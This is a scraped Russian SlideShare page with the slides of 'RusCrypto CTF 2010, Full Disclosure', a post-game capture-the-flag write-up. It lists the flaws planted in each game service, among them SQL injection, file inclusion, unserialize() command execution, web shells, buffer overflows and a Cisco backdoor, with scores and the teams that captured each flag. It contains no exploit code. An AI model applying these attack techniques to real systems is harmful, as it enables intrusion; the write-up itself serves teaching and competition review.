Тестирование на проникновение в сетях Microsoft (v.2)Dmitry Evteev
 
Тестирование на проникновение в сетях Microsoft
Тестирование на проникновение в сетях MicrosoftТестирование на проникновение в сетях Microsoft
Тестирование на проникновение в сетях MicrosoftDmitry Evteev
 
PHDays CTF 2011 Quals/Afterparty: как это было
PHDays CTF 2011 Quals/Afterparty: как это былоPHDays CTF 2011 Quals/Afterparty: как это было
PHDays CTF 2011 Quals/Afterparty: как это былоDmitry Evteev
 
Как взламывают сети государственных учреждений
Как взламывают сети государственных учрежденийКак взламывают сети государственных учреждений
Как взламывают сети государственных учрежденийDmitry Evteev
 
Введение в тему безопасности веб-приложений
Введение в тему безопасности веб-приложенийВведение в тему безопасности веб-приложений
Введение в тему безопасности веб-приложенийDmitry Evteev
 
Практика проведения DDoS-тестирований
Практика проведения DDoS-тестированийПрактика проведения DDoS-тестирований
Практика проведения DDoS-тестированийDmitry Evteev
 
Мобильный офис глазами пентестера
Мобильный офис глазами пентестераМобильный офис глазами пентестера
Мобильный офис глазами пентестераDmitry Evteev
 
Безопасность веб-приложений сегодня
Безопасность веб-приложений сегодняБезопасность веб-приложений сегодня
Безопасность веб-приложений сегодняDmitry Evteev
 

Mehr von Dmitry Evteev (20)

Противодействие хищению персональных данных и платежной информации в сети Инт...
Противодействие хищению персональных данных и платежной информации в сети Инт...Противодействие хищению персональных данных и платежной информации в сети Инт...
Противодействие хищению персональных данных и платежной информации в сети Инт...
 
penetest VS. APT
penetest VS. APTpenetest VS. APT
penetest VS. APT
 
Уязвимости систем ДБО в 2011-2012 гг.
Уязвимости систем ДБО в 2011-2012 гг.Уязвимости систем ДБО в 2011-2012 гг.
Уязвимости систем ДБО в 2011-2012 гг.
 
Статистика по результатам тестирований на проникновение и анализа защищенност...
Статистика по результатам тестирований на проникновение и анализа защищенност...Статистика по результатам тестирований на проникновение и анализа защищенност...
Статистика по результатам тестирований на проникновение и анализа защищенност...
 
Реальные опасности виртуального мира.
Реальные опасности виртуального мира.Реальные опасности виртуального мира.
Реальные опасности виртуального мира.
 
Истории из жизни. Как взламывают сети крупных организаций.
Истории из жизни. Как взламывают сети крупных организаций.Истории из жизни. Как взламывают сети крупных организаций.
Истории из жизни. Как взламывают сети крупных организаций.
 
Демонстрация атаки на ДБО
Демонстрация атаки на ДБОДемонстрация атаки на ДБО
Демонстрация атаки на ДБО
 
Типовые проблемы безопасности банковских систем
Типовые проблемы безопасности банковских системТиповые проблемы безопасности банковских систем
Типовые проблемы безопасности банковских систем
 
Услуги PT для банков
Услуги PT для банковУслуги PT для банков
Услуги PT для банков
 
PHDays 2012: Future Now
PHDays 2012: Future NowPHDays 2012: Future Now
PHDays 2012: Future Now
 
Такой (не)безопасный веб
Такой (не)безопасный вебТакой (не)безопасный веб
Такой (не)безопасный веб
 
Собираем команду хакеров
Собираем команду хакеровСобираем команду хакеров
Собираем команду хакеров
 
Тестирование на проникновение в сетях Microsoft (v.2)
Тестирование на проникновение в сетях Microsoft (v.2)Тестирование на проникновение в сетях Microsoft (v.2)
Тестирование на проникновение в сетях Microsoft (v.2)
 
Тестирование на проникновение в сетях Microsoft
Тестирование на проникновение в сетях MicrosoftТестирование на проникновение в сетях Microsoft
Тестирование на проникновение в сетях Microsoft
 
PHDays CTF 2011 Quals/Afterparty: как это было
PHDays CTF 2011 Quals/Afterparty: как это былоPHDays CTF 2011 Quals/Afterparty: как это было
PHDays CTF 2011 Quals/Afterparty: как это было
 
Как взламывают сети государственных учреждений
Как взламывают сети государственных учрежденийКак взламывают сети государственных учреждений
Как взламывают сети государственных учреждений
 
Введение в тему безопасности веб-приложений
Введение в тему безопасности веб-приложенийВведение в тему безопасности веб-приложений
Введение в тему безопасности веб-приложений
 
Практика проведения DDoS-тестирований
Практика проведения DDoS-тестированийПрактика проведения DDoS-тестирований
Практика проведения DDoS-тестирований
 
Мобильный офис глазами пентестера
Мобильный офис глазами пентестераМобильный офис глазами пентестера
Мобильный офис глазами пентестера
 
Безопасность веб-приложений сегодня
Безопасность веб-приложений сегодняБезопасность веб-приложений сегодня
Безопасность веб-приложений сегодня
 

Ruscrypto CTF 2010 Full Disclosure

  • 1. РусКрипто CTF 2010, Full Disclosure Positive Technologies Май, 2010 г.
  • 2.
  • 4.
  • 5. РусКрипто CTF 2010: Дизайн игровой сети
  • 6.
  • 7. РусКрипто CTF 2010: Распределение игровой инфраструктуры
  • 8. РусКрипто CTF 2010: Топология игровой сети
  • 9.
  • 10. РусКрипто CTF 2010: еще разок поблагодарим спонсоров
  • 11. Заложенные уязвимости, пути их обнаружения и эксплуатации
  • 12.
  • 13. РусКрипто CTF 2010: Корпоративный сайт Система Уязвимости Дополнительно Сложность Баллы Захвачен Apache/PHP/MYSQL Время жизни: 2 часа с момента начала CTF SQL Injection в Insert (default error based) over Mod_Security Расположение флага известно 3-8 8 CIT, Bushwhackers, ХакерДом Только у [Censored] (!!) Подбор + File Including в cookie (default RFI) Apache / PHP / MYSQL Время жизни: на протяжении всего CTF Подбор (default information leakage) + Cross-Site Scripting Расположение флага известно 5 7 SiBears Выполнение команд на сервере Apache/PHP/MYSQL время жизни: 5 часов с момента изменения состояния Выполнение команд на сервере over unserialize() Расположение флага известно 8 10 Никто не сумел захватить флаг. Apache/PHP/MYSQL Время жизни: 2 часа с момента изменения состояния 3 back-door over web - shell (выполнение команд на сервере) Расположение флага известно 1 6 SiBears, CIT, Bushwhackers Apache / PHP / MYSQL ( bonus ) Время жизни: на протяжении всего CTF Не требуются Обнаружить архив (флаг) в картинке 1 5 Никто не сумел захватить флаг. Apache / PHP / MYSQL ( bonus ) Время жизни: на протяжении всего CTF Не требуются Флаг содержится в обфусцированном виде в index . php 2 5 Никто не сумел захватить флаг.
  • 14.
  • 15.
  • 16.
  • 17.
  • 18.
  • 19.
  • 20.
  • 21. РусКрипто CTF 2010: Корпоративный сайт ( st2)
  • 22.
  • 23.
  • 24. РусКрипто CTF 2010: Служба информирования доставщиков Система Уязвимости Дополнительно Сложность Баллы Захвачен Apache / Python / PostgreSQL Время жизни: 4 часа с момента начала CTF Классическая SQL Injection Расположение флага известно 1 7 SiBears Apache/Python/PostgreSQL Время жизни: 5 часов с момента изменения состояния Выполнение команд на сервере over AJAX Расположение флага известно 1 10 SiBears, ХакерДом , Bushwhackers, CIT Apache/Python/PostgreSQL (bonus) Время жизни: 1 час с момента оповещения о событии Выполнение команд на сервере over AJAX (дополнительный флаг) Флаг расположен в файле /var/mail/root 2 3 ХакерДом , CIT
  • 25.
  • 26.
  • 27.
  • 28.
  • 29. РусКрипто CTF 2010: Система документооборота Система Уязвимости Дополнительно Сложность Баллы Захвачен Native HTTP Server Время жизни: 3 часа с момента начала CTF Выход за пределы каталога Расположение флага известно 4-9 16 CIT, ХакерДом, SiBears Переполнение буфера Native HTTP Server Время жизни: 6 часов с момента изменения состояния Выход за пределы каталога Расположение флага известно 4-9 2 0 CIT, ХакерДом, SiBears Переполнение буфера Native HTTP Server (bonus) Время жизни: 3 часа с момента начала CTF Не требуются Реверсинг, флаг вшит в демон 8 10 CIT Native HTTP Server (bonus) Время жизни: 6 часов с момента изменения состояния Не требуются (может использоваться подбор) Флаг содержится в коде (plain text) javascript 1 3 Huge Ego Team, [Censored], CIT, Bushwhackers
  • 30.
  • 31.
  • 32.
  • 33.
  • 34.
  • 35. РусКрипто CTF 2010: Сервис управления датчиками Система Уязвимости Дополнительно Сложность Баллы Захвачен Native TCP Server Время жизни: на протяжении всего CTF Однобайтовое переполнение Расположение флага известно 10 28 CIT, Bushwhackers, ХакерДом Native TCP Server (bonus) Время жизни: на протяжении всего CTF Не требуются Реверсинг , флаг вшит в демон 2-4 1 2 SiBears, ХакерДом, CIT Native TCP Server (bonus) Время жизни: 2 часа с момента оповещения о событии Однобайтовое переполнение Флаг расположен в файле /root/.bash_history 10 3 Никто не сумел захватить флаг.
  • 36.
  • 37.
  • 38.
  • 39.
  • 40. РусКрипто CTF 2010: Тестовый сервер Система Уязвимости Дополнительно Сложность Баллы Захвачен Apache/PHP/MYSQL/BITRIX Время жизни: 5 часов с момента начала CTF Подбор (множество интерфейсов) Расположение флага известно 2 3 Bushwhackers, ХакерДом, SiBears SQL Injection/File Including Apache/PHP/MYSQL/BITRIX Время жизни: 4 часа с момента изменения состояния Подбор , SQL Injection/File Including ( если не устранено ) Расположение флага известно 1-2 4 Bushwhackers, ХакерДом, CIT, SiBears, [Censored] B ack-door (выполнение команд на сервере) Apache/PHP/MYSQL/BITRIX Время жизни: 30 минут с момента оповещения о событии Подбор (если не устранено) Флаг расположен в файле /usr/home/lena/.history 1-2 2 ХакерДом B ack-door (выполнение команд на сервере)
  • 41.
  • 42.
  • 43.
  • 44.
  • 45. РусКрипто CTF 2010: Коммутатор Cisco Система Уязвимости Дополнительно Сложность Баллы Захвачен Cisco IOS Время жизни: на протяжении всего CTF Подбор Флаг нужно найти в nvram 5 10 Bushwhackers B ack-door (на четвертом терминале разрешен доступ с privilege 15 без какой-либо авторизации) Cisco TCL rootkit (bonus) Время жизни: на протяжении всего CTF Найти порт Догадаться, каким образом можно получить флаг 1 3 ХакерДом
  • 46.
  • 47.
  • 48.
  • 49.
  • 50. РусКрипто CTF 2010: Windows Система Уязвимости Дополнительно Сложность Баллы Захвачен Win2k3 (SP1) Время жизни: с момента появления 3 часа 20 минут Подбор (множество интерфейсов) Обезвредить SMS-вирус Обнаружить и выгрузить rootkit Найти флаг в каталоге временных файлов Подобрать пароль к архиву 3-7 10 Никто не сумел захватить флаг. Эксплуатация удаленных уязвимостей Подключиться через SMB Найти флаг в каталоге временных файлов Подобрать пароль к архиву Win98 Время жизни: с момента появления до конца CTF Подбор Флаг содержится в данных из PWL-файла 3 12 Никто не сумел захватить флаг.
  • 51. РусКрипто CTF 2010: Windows 2003
  • 52.
  • 53.
  • 54.
  • 56. РусКрипто CTF 2010: Хронология начисления баллов на протяжении всего соревнования
  • 57. РусКрипто CTF 2010: Динамика начисления баллов Бледно-красным цветом выделено максимальное значение в пределах каждого 15-минутного интервала времени, синим цветом – второе по величине значение, зеленым цветом – третье по величине значение. Максимальное количество баллов, которое каждой команде удалость заработать за 15 минут в течение всего соревнования CTF, выделено ярко-красным цветом.
  • 58.
  • 59.
  • 60.
  • 61.
  • 62. Спасибо за внимание! Вопросы ? [email_address] http://devteev.blogspot.com/